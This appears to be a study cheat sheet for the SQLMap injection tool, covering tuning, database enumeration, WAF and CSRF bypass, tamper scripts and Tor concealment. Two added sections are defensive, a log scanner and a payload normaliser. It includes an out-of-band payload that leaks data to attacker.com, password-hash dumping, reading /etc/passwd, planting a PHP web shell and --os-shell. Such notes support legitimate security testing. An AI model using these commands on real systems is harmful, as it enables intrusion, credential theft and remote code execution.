SQLMap

SQLMap can also take injection points from JSON and XML request bodies.

  • Target connection

  • Injection detection

  • Fingerprinting

  • Enumeration

  • Optimization

  • Protection detection and bypass using "tamper" scripts

  • Database content retrieval

  • File system access

  • Execution of operating system (OS) commands

Installation

$ sudo apt install sqlmap
$ git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
$ python sqlmap-dev/sqlmap.py    # when installed via the git clone above

Injection Types

  • B: Boolean-based blind

  • E: Error-based

  • U: Union query-based

  • S: Stacked queries

  • T: Time-based blind

  • Q: Inline queries

  • Out-of-band (not sure of the syntax)

    LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\README.txt'))

Basic Usage

$ sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

--batch answers every interactive prompt with its default, so no user input is required

Post Method

$ sqlmap -u 'http://www.example.com/' --data 'uid=1&name=test'

Using Full request

$ sqlmap -r req.txt

Custom requests

$ sqlmap ... --cookie="PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c"
$ sqlmap ... -H "Cookie: PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c"

Other request options: --referer, --host, -A/--user-agent, --method

--random-agent selects a random browser User-Agent

--mobile imitates a smartphone by using a mobile User-Agent

Sample Usage

$ sqlmap -r case4.txt --dbms mysql --technique U --hex -T flag4 --dump

Attack Tuning

Prefix and Suffix

$ sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Level and Risk

$ sqlmap -u www.example.com/?id=1 -v 3 --level=5 --risk=3

--risk controls how risky the payloads may be (higher-risk payloads can cause problems or a DoS on the target)

--level widens the set of tests and parameters tried; higher levels include payloads with a lower chance of success

--level=1 --risk=1 is 72 payloads while --level=5 --risk=3 is 7865

Status Code

--code=200 treats responses with HTTP status 200 as the True case

Titles

--titles compares responses by their HTML <title> only

Strings

--string=success names a string that appears only in True responses

Text-only

--text-only compares responses on their visible text only (tags stripped)

Technique

--technique=BEU (boolean, error, union)

Union Based

--union-cols=17

--union-char='a' uses 'a' instead of NULL for the UNION columns (union select 'a','a','a')

--union-from=users names a table for the FROM part of the UNION query, needed by DBMSs such as Oracle

Database Enumeration

--banner retrieves the DBMS version banner

--current-user retrieves the current DBMS user

--current-db retrieves the current database (database() in MySQL)

--is-dba checks whether the current user has DBA (admin) rights

--dump-format html/csv selects the dump output format

-C username,password retrieves only the given columns

--start=2 --stop=3 retrieves only rows 2 to 3

--where="name LIKE 'f%'" applies a WHERE condition when dumping

--dump dumps the table given with -T (or the whole database if no -T is given)

--dump-all dumps the content of every database

--schema prints a complete overview of the database structure

--search -T user searches for tables whose name matches "user"

--search -C pass searches for columns whose name matches "pass"

--passwords enumerates the DBMS users' password hashes (e.g. from mysql.user in MySQL)

--all runs every enumeration option; together with --batch it needs no interaction

Bypassing Web Application Protections

Anti CSRF Token Bypass

$ sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Unique Value Bypass

$ sqlmap -u "http://www.example.com/?id=1&rp=29125" --randomize=rp --batch -v 5

Calculated Parameter Bypass

$ sqlmap -u "http://www.example.com/?id=1&h=c4ca4238a0b923820dcc509a6f75849b" --eval="import hashlib; h=hashlib.md5(id.encode()).hexdigest()" --batch -v 5

IP Address Concealing

--proxy="socks4://177.39.187.70:33283"

--proxy-file

--tor

--check-tor verifies that Tor is actually being used for the requests

WAF Bypass

--skip-waf to skip WAF heuristic checks

User-Agent Blacklisting Bypass

--random-agent
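A defender-side check that goes with the point above, added here as an example (it is not from the page or the sqlmap project): a User-Agent blacklist catches sqlmap's default agent string (`sqlmap/<version>#stable (https://sqlmap.org)`), but once `--random-agent` is used the agent looks like a browser, so a second signal on the decoded request is needed. The log lines are constructed; the regexes are my own coarse indicators, not sqlmap's.

```python
# Added example, not sqlmap's code: scan constructed Apache combined-format log lines
# for (a) sqlmap's default User-Agent and (b) SQL-injection-looking query strings,
# to show what a UA blacklist alone misses once --random-agent is in play.
import re
from urllib.parse import unquote_plus

# Constructed sample lines: two default-agent requests, one request with a
# browser-looking agent (as --random-agent would send), and one benign request.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vuln.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /vuln.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"',
    '10.0.0.9 - - [01/Jan/2024:10:05:00 +0000] "GET /vuln.php?id=1%20UNION%20SELECT%20NULL HTTP/1.1" 200 640 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '10.0.0.7 - - [01/Jan/2024:10:06:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# sqlmap's default agent starts with "sqlmap/"; --random-agent replaces it entirely.
DEFAULT_UA_RE = re.compile(r"^sqlmap/", re.IGNORECASE)

# Coarse SQL-injection indicators, applied to the URL-decoded path and query string.
PAYLOAD_RE = re.compile(
    r"\bunion\b.*\bselect\b|\bsleep\s*\(|/\*\*/|\b(?:and|or)\b\s+\d+\s*=\s*\d+",
    re.IGNORECASE,
)


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(line):
    """Return the list of reasons a line is suspicious (an empty list means benign)."""
    fields = parse_line(line)
    if fields is None:
        return ["unparsable"]
    reasons = []
    if DEFAULT_UA_RE.search(fields["ua"]):
        reasons.append("default-ua")
    if PAYLOAD_RE.search(unquote_plus(fields["path"])):
        reasons.append("sqli-payload")
    return reasons


def scan(lines):
    """Return one record per flagged line: source IP, user agent and the reasons."""
    hits = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            fields = parse_line(line) or {"ip": "?", "ua": "?"}
            hits.append({"ip": fields["ip"], "ua": fields["ua"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(LOG_LINES):
        print(hit["ip"], hit["reasons"], hit["ua"])
```

Run as-is to see that the third line (browser agent, UNION SELECT in the query) is flagged only by the payload check; a UA-only blacklist would have let it through.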

Tamper Scripts

Tamper-Script               Description
0eunion                     Replaces instances of UNION with e0UNION
base64encode                Base64-encodes all characters in a given payload
between                     Replaces greater than operator (>) with NOT BETWEEN 0 AND # and equals operator (=) with BETWEEN # AND #
commalesslimit              Replaces (MySQL) instances like LIMIT M, N with LIMIT N OFFSET M counterpart
equaltolike                 Replaces all occurrences of operator equal (=) with LIKE counterpart
halfversionedmorekeywords   Adds (MySQL) versioned comment before each keyword
modsecurityversioned        Embraces complete query with (MySQL) versioned comment
modsecurityzeroversioned    Embraces complete query with (MySQL) zero-versioned comment
percentage                  Adds a percentage sign (%) in front of each character (e.g. SELECT -> %S%E%L%E%C%T)
plus2concat                 Replaces plus operator (+) with (MsSQL) function CONCAT() counterpart
randomcase                  Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
space2comment               Replaces space character ( ) with comments /**/
space2dash                  Replaces space character ( ) with a dash comment (--) followed by a random string and a new line (\n)
space2hash                  Replaces (MySQL) instances of space character ( ) with a pound character (#) followed by a random string and a new line (\n)
space2mssqlblank            Replaces (MsSQL) instances of space character ( ) with a random blank character from a valid set of alternate characters
space2plus                  Replaces space character ( ) with plus (+)
space2randomblank           Replaces space character ( ) with a random blank character from a valid set of alternate characters
symboliclogical             Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
versionedkeywords           Encloses each non-function keyword with (MySQL) versioned comment
versionedmorekeywords       Encloses each keyword with (MySQL) versioned comment
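To make the table concrete, here is an added example (my own code, not sqlmap's) that re-implements four of the listed transformations in pure Python, in the shape sqlmap gives a tamper script: a module-level `tamper(payload, **kwargs)` that returns the rewritten payload. Real scripts live under sqlmap's `tamper/` directory, are selected with `--tamper=name1,name2`, and set `__priority__` from `lib.core.enums.PRIORITY`; that import is left out so the file runs without sqlmap installed, and the `rng` keyword is an assumption for testability, not something sqlmap passes. `normalize()` is the defender-side counterpart: every transform leaves the SQL meaning unchanged, so a WAF or log rule has to canonicalise before matching or it will miss the tampered form.

```python
# Added example, not sqlmap's code: simplified re-implementations of the
# space2comment, randomcase, symboliclogical and between tamper transformations,
# a tamper() entry point in sqlmap's shape, and a normalize() that undoes them.
import random
import re

SQL_KEYWORDS = ("SELECT", "UNION", "AND", "OR", "FROM", "WHERE", "ORDER", "BY", "LIMIT", "NULL")
KEYWORD_RE = re.compile(r"\b(" + "|".join(SQL_KEYWORDS) + r")\b", re.IGNORECASE)


def space2comment(payload):
    """Replace each space with an inline comment: '1 AND 1=1' -> '1/**/AND/**/1=1'."""
    return payload.replace(" ", "/**/")


def randomcase(payload, rng=random):
    """Randomise the case of every character of each SQL keyword (SELECT -> SEleCt)."""
    def flip(match):
        return "".join(rng.choice((c.lower(), c.upper())) for c in match.group(0))
    return KEYWORD_RE.sub(flip, payload)


def symboliclogical(payload):
    """Replace the AND and OR keywords with && and ||."""
    payload = re.sub(r"\bAND\b", "&&", payload, flags=re.IGNORECASE)
    return re.sub(r"\bOR\b", "||", payload, flags=re.IGNORECASE)


def between(payload):
    """Rewrite 'A>B' as 'A NOT BETWEEN 0 AND B' and 'A=B' as 'A BETWEEN B AND B'.
    Simplified: only plain word>word and word=word comparisons are handled."""
    payload = re.sub(r"(\w+)\s*>\s*(\w+)", r"\1 NOT BETWEEN 0 AND \2", payload)
    return re.sub(r"(\w+)\s*=\s*(\w+)", r"\1 BETWEEN \2 AND \2", payload)


def tamper(payload, **kwargs):
    """Entry point in the shape sqlmap calls; chains randomcase and space2comment."""
    if not payload:
        return payload
    # Assumption for testability: a seeded random.Random may be injected as rng.
    rng = kwargs.get("rng", random)
    return space2comment(randomcase(payload, rng))


def normalize(payload):
    """Defender-side canonicalisation: drop inline comments, restore symbolic logical
    operators, collapse whitespace and upper-case, so a rule matches the plain form."""
    s = re.sub(r"/\*.*?\*/", " ", payload)
    s = s.replace("&&", " AND ").replace("||", " OR ")
    s = re.sub(r"\s+", " ", s).strip()
    return s.upper()


if __name__ == "__main__":
    original = "1 AND 1=1 UNION SELECT NULL"
    for name, fn in (("space2comment", space2comment), ("randomcase", randomcase),
                     ("symboliclogical", symboliclogical), ("between", between)):
        print(f"{name:16} {fn(original)}")
    print(f"{'normalized':16} {normalize(tamper(original))}")
```

The point of `normalize()` is that `normalize(tamper(p))` equals `normalize(p)` for the comment and case transforms, which is exactly the property a signature engine needs; `between` changes the SQL syntax itself, so it needs a rule of its own rather than a canonicalisation step.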

Miscellaneous Bypass

--chunked sends the POST request body using HTTP chunked transfer encoding

Reading Files and RCE

$ sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
$ sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
$ sqlmap -u "http://www.example.com/?id=1" --os-shell    # often works on MSSQL

Note: if --os-shell fails, try other --technique values where applicable.
